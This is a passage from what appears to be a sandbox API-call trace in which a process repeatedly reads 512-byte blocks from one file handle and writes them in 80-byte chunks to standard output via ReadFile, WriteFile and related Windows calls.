(_FileHandle=4) returned 0x54 [0092.749] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] 
GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.750] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | 
out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.752] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] GetFileType (hFile=0x4c) returned 0x1 [0092.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.752] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.753] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) 
returned 1 [0092.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.753] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] GetFileType (hFile=0x4c) returned 0x1 [0092.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.753] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.754] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.754] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, 
lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] GetFileType (hFile=0x4c) returned 0x1 [0092.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.754] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.755] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.755] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] GetFileType (hFile=0x4c) returned 0x1 [0092.755] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.755] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.756] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.756] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, 
lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] GetFileType (hFile=0x4c) returned 0x1 [0092.756] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.756] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.757] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.757] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, 
